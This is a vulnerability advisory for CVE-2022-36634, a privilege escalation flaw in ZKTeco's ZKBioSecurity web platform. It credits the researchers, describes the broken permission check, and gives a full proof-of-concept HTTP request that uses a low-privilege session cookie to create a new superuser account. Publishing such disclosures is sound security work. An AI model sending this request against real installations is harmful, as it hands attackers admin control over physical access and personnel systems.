#######################ADVISORY INFORMATION####################### Product: ZKSecurity BIO Vendor: ZKTeco Version Affected: 3.0.5.0_R CVE: CVE-2022-36634 Vulnerability: User privilege escalation #######################CREDIT####################### This vulnerability was discovered and researched by Caio Burgardt and Silton Santos. #######################INTRODUCTION####################### Based on the hybrid biometric technology and computer vision technology, ZKBioSecurity provides a comprehensive web-based security platform. It contains multiple integrated modules: personnel, time & attendance, access control, visitor management, offline & online consumption management, guard patrol, parking, elevator control, entrance control, Facekiosk, intelligent video management, mask and temperature detection module, and other smart sub-systems. #######################VULNERABILITY DETAILS####################### The application's access control management does not check the session's permissions correctly. An attacker with "Person Self-Login" or "User" privilege can create a super user with full privileges in the application #######################PROOF OF CONCEPT####################### POST /authUserAction!edit.action HTTP/1.1 Host: {HOST} User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------291763244192371568695079347 Content-Length: 1956 Origin: http://{HOST}:8088 Connection: close Referer: http://{HOST}:8088/base_index.action Cookie: <INSERT_LOW-PRIVILEGE_COOKIE_HERE> Upgrade-Insecure-Requests: 1 -----------------------------291763244192371568695079347 Content-Disposition: form-data; name="authUser.username" test_privesc -----------------------------291763244192371568695079347 Content-Disposition: form-data; name="authUser.loginPwd" KDla123 -----------------------------291763244192371568695079347 Content-Disposition: form-data; name="repassword" KDla123 -----------------------------291763244192371568695079347 Content-Disposition: form-data; name="authUser.isActive" true -----------------------------291763244192371568695079347 Content-Disposition: form-data; name="authUser.isSuperuser" true -----------------------------291763244192371568695079347 Content-Disposition: form-data; name="groupIds" -----------------------------291763244192371568695079347 Content-Disposition: form-data; name="deptIds" -----------------------------291763244192371568695079347 Content-Disposition: form-data; name="areaIds" -----------------------------291763244192371568695079347 Content-Disposition: form-data; name="authUser.email" -----------------------------291763244192371568695079347 Content-Disposition: form-data; name="authUser.name" -----------------------------291763244192371568695079347 Content-Disposition: form-data; name="authUser.lastName" -----------------------------291763244192371568695079347 Content-Disposition: form-data; name="fingerTemplate" -----------------------------291763244192371568695079347 Content-Disposition: form-data; name="fingerId" -----------------------------291763244192371568695079347 Content-Disposition: form-data; name="logMethod" add -----------------------------291763244192371568695079347 Content-Disposition: form-data; name="un" 1657813612925_286 -----------------------------291763244192371568695079347 Content-Disposition: form-data; name="systemCode" base -----------------------------291763244192371568695079347-- #######################END#######################